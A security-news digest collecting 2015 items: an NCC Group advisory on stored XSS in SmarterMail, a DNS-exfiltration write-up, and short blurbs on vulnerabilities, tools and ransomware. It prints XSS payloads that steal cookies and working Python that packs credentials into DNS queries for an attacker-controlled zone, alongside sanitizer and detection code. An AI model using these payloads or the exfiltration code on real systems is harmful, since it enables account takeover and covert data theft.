Channel: BOT24

SmarterMail - Stored XSS in emails

NCC Group
https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title SmarterMail - Stored XSS in emails
Release Date 6 March 2015
Reference NCC00776
Discoverer Soroush Dalili
Vendor Smarter Tools
Systems Affected v13.1.5451 and prior
CVE Reference TBC
Risk Medium
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 29 December 2014
Reported 9 February 2015
Released 30 December 2014
Fixed 26 February 2015
Published 6 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
SmarterMail was vulnerable to stored cross-site scripting: its anti-XSS
filtering could be bypassed, so JavaScript embedded in an attacker's email
ran in the victim's browser when the victim opened or replied to that email.
Because the password change page did not require the current password, such
a script could reset the victim's password.
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following payload could be used to run JavaScript when the victim opens
the email (the "/" between the tag name and the event handler defeats
filters that expect whitespace before "onload="):
<svg/onload="insert malicious script here"></svg>
The following payload could be used to run JavaScript when the victim
presses the reply button:
<iframe src=javascript:"insert malicious script here"></iframe>
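As an added illustration (not code from the advisory or from SmarterTools), the following Python stand-in shows why a blacklist filter misses both payloads above and what an allowlist sanitizer does instead: the "/" separator defeats a pattern that expects whitespace before an event handler, and an unquoted javascript: src defeats one that expects quotes. The blacklist patterns, the tag/attribute allowlist and the sample payloads are all constructed for this example; the sanitizer is built on the standard library's html.parser, which tokenizes "<svg/onload=" the same way a browser does.

```python
import html
import re
from html.parser import HTMLParser

# Constructed stand-in for a blacklist "anti-XSS" filter. It is not
# SmarterMail's code; it only shows the kind of matching both advisory
# payloads slip past.
NAIVE_PATTERNS = [
    re.compile(r"<script\b", re.I),
    re.compile(r"\s+on\w+\s*=", re.I),                      # assumes whitespace before on*=
    re.compile(r"""src\s*=\s*["']\s*javascript:""", re.I),  # assumes a quoted URL
]

def naive_filter_blocks(markup: str) -> bool:
    """True if the blacklist would reject the markup."""
    return any(p.search(markup) for p in NAIVE_PATTERNS)

# Allowlist sanitizer: anything not explicitly permitted is removed.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol",
                "li", "div", "span", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}                 # no on* attribute anywhere
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style"}                  # their text is discarded too
SAFE_SCHEME = re.compile(r"^(?:https?:|mailto:)", re.I)

def safe_url(value: str) -> bool:
    """Reject javascript: and every other non-allowlisted scheme. Browsers
    ignore ASCII controls/whitespace inside a scheme, so strip them first."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    if ":" not in cleaned:
        return True                                      # relative URL
    return bool(SAFE_SCHEME.match(cleaned))

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0

    def handle_starttag(self, tag, attrs):
        # html.parser sees "<svg/onload=" as tag "svg" with attribute "onload",
        # exactly as a browser would, so the separator trick does not matter here.
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return                                       # tag removed, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth = max(0, self._drop_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._drop_depth == 0:
            self.out.append(html.escape(data, quote=False))

def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

# Constructed payloads: the advisory's two shapes with a placeholder script,
# plus a tab-obfuscated javascript: URL to exercise safe_url().
SVG_PAYLOAD = '<svg/onload="alert(document.cookie)"></svg>'
IFRAME_PAYLOAD = '<iframe src=javascript:alert(document.cookie)></iframe>'
TAB_PAYLOAD = '<a href="java&#9;script:alert(1)">click</a>'

if __name__ == "__main__":
    for payload in (SVG_PAYLOAD, IFRAME_PAYLOAD, TAB_PAYLOAD):
        print(f"blacklist blocks: {naive_filter_blocks(payload)!s:<5}  "
              f"allowlist output: {sanitize(payload)!r}")
```

The point of the allowlist is that it never has to enumerate attacker tricks: the parser normalises the markup, every attribute not on the list is dropped whatever separator preceded it, and URLs are checked by scheme after control characters are removed rather than by looking for a quoted "javascript:" string.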
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The issue was patched in Version 13.3.5535 (2015-02-26) which can be
downloaded here:
http://www.smartertools.com/smartermail/releasenotes/v13.aspx
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/

Paper: Triathlon of Lightweight Block Ciphers for the Internet of Things

Abstract. In this paper we introduce an open framework for the benchmarking of lightweight
block ciphers on a multitude of embedded platforms. Our framework is able to evaluate execution
time, RAM footprint, as well as (binary) code size, and allows a user to define a custom “figure
of merit” according to which all evaluated candidates can be ranked. We used the framework to
benchmark various implementations of 13 lightweight ciphers, namely AES, Fantomas, HIGHT,
LBlock, LED, Piccolo, PRESENT, PRINCE, RC5, Robin, Simon, Speck, and TWINE, on three
different platforms: 8-bit ATmega, 16-bit MSP430, and 32-bit ARM. Our results give new insights
to the question of how well these ciphers are suited to secure the Internet of Things (IoT). The
benchmarking framework provides cipher designers with a tool to compare new algorithms with the
state-of-the-art and allows standardization bodies to conduct a fair and comprehensive evaluation
of a large number of candidates.


more here...........http://eprint.iacr.org/2015/209.pdf

Exfiltrate Data via DNS with Egress-Assess

DNS is a channel that can usually be used to exfiltrate data out of a network. Even when the network you are operating in requires authentication to a proxy before data can leave, users can typically still make DNS requests, which the local DNS servers forward upstream on their behalf. An attacker can use this normal DNS functionality to move data, C2 traffic, etc. out of the current network to a destination of their choosing, and Raphael Mudge has already weaponized this for Beacon in Cobalt Strike.

A new module has been added to Egress-Assess that lets you use your system's configured DNS server to exfiltrate data. This differs from the existing DNS module within Egress-Assess: the existing module sends DNS packets directly to a DNS server you specify, whereas the "dns_resolved" module goes through your network's own resolver.
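The forwarding behaviour described above, as an added Python example that is not part of Egress-Assess and makes no network calls: data is packed into legal hostnames under an assumed attacker-controlled zone (exfil.example), which any internal resolver will forward upstream, and the receiving side reassembles the payload from the query names its authoritative server logged. The label and name limits are from RFC 1035; the chunk format, the session label, the sample secret and the detection heuristic at the end are this example's own.

```python
import base64
import math

# Assumed attacker-controlled zone. To receive anything, an authoritative
# name server for it must log the names it is asked for. Nothing here
# touches the network; "observed" names are handed to the decoder directly.
EXFIL_DOMAIN = "exfil.example"
MAX_LABEL = 63          # RFC 1035: a label is at most 63 octets
MAX_NAME = 253          # practical maximum for a textual domain name

def _b32(data: bytes) -> str:
    # base32 keeps names case-insensitive and free of characters
    # resolvers might reject; padding is dropped and restored on decode.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()

def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))

def encode_queries(session_id: str, payload: bytes, chunk_size: int = 30) -> list:
    """Split payload into query names of the form
    <seq>-<total>.<base32 chunk in 63-char labels>.<session>.<EXFIL_DOMAIN>
    Each name is a syntactically valid hostname, so a resolver forwards it."""
    total = math.ceil(len(payload) / chunk_size)
    names = []
    for seq in range(total):
        chunk = payload[seq * chunk_size:(seq + 1) * chunk_size]
        encoded = _b32(chunk)
        data_labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
        name = ".".join([f"{seq}-{total}", *data_labels, session_id, EXFIL_DOMAIN])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for a single query name")
        names.append(name)
    return names

def decode_queries(observed: list) -> dict:
    """Reassemble payloads from query names seen at the authoritative server.
    Tolerates duplicates (resolver retries) and arbitrary order; returns only
    the sessions for which every chunk has arrived."""
    suffix = "." + EXFIL_DOMAIN
    partial = {}
    for raw in observed:
        name = raw.rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3:
            continue
        header, *data_labels, session = labels
        try:
            seq, total = (int(part) for part in header.split("-", 1))
            chunk = _unb32("".join(data_labels))      # binascii.Error is a ValueError
        except ValueError:
            continue                                  # not ours, or corrupted
        entry = partial.setdefault(session, {"total": total, "chunks": {}})
        entry["chunks"][seq] = chunk
    complete = {}
    for session, entry in partial.items():
        if all(i in entry["chunks"] for i in range(entry["total"])):
            complete[session] = b"".join(entry["chunks"][i] for i in range(entry["total"]))
    return complete

def looks_like_exfil(name: str, min_label: int = 40) -> bool:
    """Cheap heuristic for resolver logs: a long label drawn only from the
    base32 alphabet is rare in legitimate hostnames."""
    alphabet = set("abcdefghijklmnopqrstuvwxyz234567")
    return any(len(label) >= min_label and set(label) <= alphabet
               for label in name.lower().split("."))

# Constructed sample secret (120 bytes), not real data.
SAMPLE_SECRET = b"user=alice;pass=hunter2;" * 5

if __name__ == "__main__":
    queries = encode_queries("s1", SAMPLE_SECRET)
    for q in queries:
        print(q, "  suspicious:", looks_like_exfil(q))
    print(decode_queries(queries[::-1]))
```

Each query carries only a few dozen bytes, so a real transfer is many queries; that volume, and the long high-entropy labels, are what the heuristic in looks_like_exfil keys on, which is also why a blue team should be looking at resolver logs rather than only at the proxy.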

more here.......https://www.christophertruncer.com/exfiltrate-data-via-dns-with-egress-assess/

Mobile App Wall of Shame: Quikr

Quikr is India's largest online and mobile classifieds portal. Like Craigslist, Quikr provides the users with a platform to help them buy, sell, rent and advertise across multiple categories like real estate, jobs, entertainment, education, matrimonial, etc. Quikr also has a mobile app on both the Android and iOS platforms.

A user is required to provide an email address and password when creating an account. After creating an account, the user can then post advertisements on Quikr. The application also provides functionality wherein different users can chat with each other.

Vulnerability - Clear text username/password


more here.........http://research.zscaler.com/2015/03/mobile-app-wall-of-shame-quikr.html

The Importance of Good Labels in Security Datasets

Working as security researchers, it is common to create a new machine learning algorithm that we want to evaluate. It may be that we are trying to detect malware, identify attacks or analyze IDS logs, but at some point we figure out that we need a good dataset to complete our task. But not any dataset; in fact we need a labeled dataset. The dataset will be used not only to learn the features of, for example, malware traffic, but also to verify how good our algorithm is. Since getting a dataset is difficult and time consuming, the most common solution is to get a third-party dataset, although some researchers with time and resources may create their own. Either way, we most often obtain a dataset of malware traffic (continuing with the malware traffic detection example) and assign the label Malware to all of its instances. This looks good, so we do our training and testing, we obtain results and we publish. However, there are important problems in this approach that can jeopardize the results of our algorithm and the verification process. Let's analyze each problem in turn.

more here..........https://www.mlsecproject.org/blog/2015/03/06/importance-good-labels-security-datasets/

Saying goodbye to encrypted SMS/MMS

It’s 2015, and the end of the road for encrypted SMS/MMS in TextSecure.

The TextSecure story started back in 2009, at the dawn of the smartphone era. Back then, TextSecure focused on securing the transport that everyone coming from feature phones was familiar with: SMS. Today, many things have changed, and TextSecure now emphasizes the “TextSecure transport,” which uses data rather than SMS. While we remain committed to supporting plaintext SMS/MMS so that TextSecure can function as a unified messenger, we are beginning the process of phasing out support for SMS/MMS as an encrypted transport.

more here..........https://whispersystems.org/blog/goodbye-encrypted-sms/

Registry Explorer 0.0.2.0 released!

Lots of good changes in this version that you can view here.....http://binaryforay.blogspot.com/2015/03/registry-explorer-0020-released.html

Google OAuth Target URL and Domain Description Vulnerable to UI redress attack

Over the last 3 years, I've participated in the Google Reward Program and found some relatively serious vulnerabilities. Google OAuth Target URL, Upload X.509 Cert and Domain Description Vulnerable to UI Redress Attack is one of my oldest findings in the Google Reward Program.

more here..........http://blog.securelayer7.net/google-oauth-target-url-and-domain-description-vulnerable-to-ui-redress-attack/

ON THE SECURITY IMPLICATIONS OF WINDOW.OPENER.LOCATION.REPLACE()

It’s no secret I am a big fan of many HackerOne bug reports and public penetration test reports authored by companies such as Cure53 and Least Authority.

In fact, pretty much every week I spend some of my free time reading bug reports. Regularly I stumble upon very interesting attack vectors and oftentimes learn tricks I had never seen before. This post is about one of the techniques I learned some time ago whilst reading a report submitted to HackerOne, authored by a bounty hunter named Daniel Tomescu.

more here...........http://blog.whatever.io/2015/03/07/on-the-security-implications-of-window-opener-location-replace/

MentalJS DOM bypass

Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions.

more here.........http://www.thespanner.co.uk/2015/03/06/mentaljs-dom-bypass/

Referer Header Based Blind SQL Injection Explained With Example

Hello everyone, this post is the third in a series of posts that I will be doing on SQL injection. Earlier I explained Second Order SQL Injections with Example and Column Truncation SQL Injection Vulnerabilities. Hopefully I will be doing more of these, focusing only on topics that are not well explained anywhere else and providing examples so that readers can actually relate to what is going on. So in this post I will be explaining the referer header and blind SQL injection; I prepared a demo for referer-based blind SQL injection and will give a walkthrough of it. At the end, blind SQL injection exploitation using SQLmap.

more here.........https://haiderm.com/referer-header-based-blind-sql-injection-explained-example/

Mono TLS vulnerabilities

A TLS impersonation attack was discovered in Mono's TLS stack by
researchers at Inria. During checks on our TLS stack, we have
discovered two further issues which we have fixed - SSLv2 support, and
vulnerability to FREAK. These vulnerabilities affect basically every
Mono version ever released.

more here..........http://permalink.gmane.org/gmane.comp.security.oss.general/16048

Ransomware Report: The Rise of BandarChor

This week, we have received a number of reports on yet another ransomware, BandarChor.

This ransomware is not exactly fresh. The first infections that we've noticed related to this family already came in last November.

We have had reports of BandarChor being spread via email and have seen indicators that it may have been distributed by exploit kits.

more here.........https://www.f-secure.com/weblog/archives/00002795.html

ClassNameDeobfuscator

This is a simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.

Obfuscation can be a pain to deal with when reversing an app. However, some apps do not have the .source annotation line removed or mangled during the obfuscation process. This leaves the original Java source file name intact in the obfuscated code. We can abuse this to partially deobfuscate the class names.

To be clear, I am not claiming that I am the first to discover this, for lack of a better term let's call it, information leakage. However, I did stumble upon it independently while reversing an obfuscated app. Looking at a smali file, I noticed a .source line and a lightbulb went off. So, I threw together this script to show off the extent of what information can be revealed. See the demo section below for some relevant Proguard details.
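As an added example (not the ClassNameDeobfuscator script itself), here is a Python version of the same idea run over constructed smali fragments: read the .class descriptor and the .source directive from each file, rebuild the likely original name, and flag the two cases where the trick fails: the attribute was stripped (ProGuard only keeps it with -keepattributes SourceFile), or it was replaced by the literal "SourceFile" via -renamesourcefileattribute. The inner-class handling, the status labels and the sample files are assumptions of this example.

```python
import re

# Directives at the top of every smali file produced by apktool/baksmali:
#   .class <modifiers> L<pkg>/<Name>;
#   .source "<OriginalFile>.java"    (absent if the SourceFile attribute was stripped)
CLASS_RE = re.compile(r'^\.class\s+(?:[\w$]+\s+)*L([^;\s]+);', re.M)
SOURCE_RE = re.compile(r'^\.source\s+"([^"]*)"', re.M)

# ProGuard writes the literal "SourceFile" when configured with
# -renamesourcefileattribute SourceFile, which defeats this recovery.
PLACEHOLDERS = {"SourceFile", ""}

def recover_class_names(smali_files: dict) -> dict:
    """Map each class descriptor (e.g. a/b/c$1) to (recovered name or None, status).
    smali_files maps a file path to that file's text."""
    result = {}
    for _path, text in sorted(smali_files.items()):
        cls = CLASS_RE.search(text)
        if not cls:
            continue
        descriptor = cls.group(1)
        package, _, simple = descriptor.rpartition("/")
        outer, dollar, inner = simple.partition("$")   # inner classes share the outer's .source
        src = SOURCE_RE.search(text)
        if not src:
            result[descriptor] = (None, "stripped")
            continue
        source = src.group(1)
        stem = re.sub(r"\.(java|kt)$", "", source)
        if source in PLACEHOLDERS or stem == source:
            result[descriptor] = (None, "renamed")
            continue
        recovered = stem + ("$" + inner if dollar else "")
        if package:
            recovered = package + "/" + recovered
        status = "unobfuscated" if outer == stem else "recovered"
        result[descriptor] = (recovered, status)
    return result

# Constructed smali fragments (assumed, not from any real app): one renamed
# class with its anonymous inner class, one with the placeholder, one with
# the attribute stripped, and one that was never obfuscated.
SAMPLE_SMALI = {
    "smali/a/b/c.smali": '.class public final La/b/c;\n.super Landroid/app/Activity;\n'
                         '.source "LoginActivity.java"\n\n# instance fields\n'
                         '.field private a:Ljava/lang/String;\n',
    "smali/a/b/c$1.smali": '.class final La/b/c$1;\n.super Ljava/lang/Object;\n'
                           '.source "LoginActivity.java"\n',
    "smali/a/b/d.smali": '.class public La/b/d;\n.super Ljava/lang/Object;\n'
                         '.source "SourceFile"\n',
    "smali/a/b/e.smali": '.class public La/b/e;\n.super Ljava/lang/Object;\n',
    "smali/com/example/app/MainActivity.smali":
        '.class public Lcom/example/app/MainActivity;\n.super Landroid/app/Activity;\n'
        '.source "MainActivity.java"\n',
}

if __name__ == "__main__":
    for descriptor, (name, status) in recover_class_names(SAMPLE_SMALI).items():
        print(f"{descriptor:32} -> {name or '?':32} [{status}]")
```

On a real apktool output directory the same function works over the text of every *.smali file under smali/; the "renamed" and "stripped" counts tell you quickly whether the trick is worth pursuing for that build.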


more here.......https://github.com/HamiltonianCycle/ClassNameDeobfuscator

PHP Reflect

PHP Reflect is a library that adds the ability to reverse-engineer classes, interfaces, functions, constants, namespaces and more.


Additional info here....https://github.com/llaville/php-reflect

keysweeper

KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity.

All keystrokes are logged online and locally. SMS alerts are sent upon trigger words, usernames or URLs, exposing passwords. If unplugged, KeySweeper continues to operate using its internal battery and auto-recharges upon repowering. A web based tool allows live keystroke monitoring.

more here........https://github.com/samyk/keysweeper

Visa and Other Gift Card Transactions Exposed by GoWallet Vulnerability

I recently received a Visa Gift Card and decided to use GoWallet to manage it, as advertised on the card’s packaging. GoWallet offers the ability to manage most types of gift cards, allowing a user to view their card’s current balance and past transactions.

I signed up on their website and associated the card to my account. Next, I downloaded the app and started to review the API requests while exploring the card management features.

Most of the requests looked normal, but the process for reviewing transactions seemed interesting.

more here.........http://randywestergren.com/visa-gift-card-transactions-exposed-gowallet-vulnerability/

Scope Injection in CFML

Here is an interesting vulnerability that I have come across several times in real CFML code during code reviews, I have spoken about it at conferences but have never written about it. Since it doesn't really have a name, I call it Scope Injection, you'll see why in a minute.

We have the following code here........http://www.petefreitag.com/item/834.cfm

VernamTunnel

Cross-platform multi-threaded TCP tunnel with Vernam cipher encryption. You can use this software to enable remote access to private services in your network. Note that a Vernam cipher is only a one-time pad when the key stream is truly random, at least as long as all traffic sent, and never reused (XORing two ciphertexts produced under the same key yields the XOR of the plaintexts); the excerpt does not say how the tool generates or distributes its keys, so check that before relying on it.

more here.......https://github.com/codeandsec/VernamTunnel

Blog on Section-Based Code Injection and Its Detection (includes a tool to help malware analysts tell whether a sample is injecting code into another process)

I wrote a small tool to detect a possible code injection even if it is done by only section APIs.

A few weeks ago, I had an opportunity to analyze ransomware referred to as Urausy. At a very initial stage of analysis, its behaviour seemed nothing surprising to me; it injected code into explorer.exe, and the injected code spawned svchost.exe hosting malicious code and initiated the main ransom activities.

more here..........http://standa-note.blogspot.ca/2015/03/section-based-code-injection-and-its.html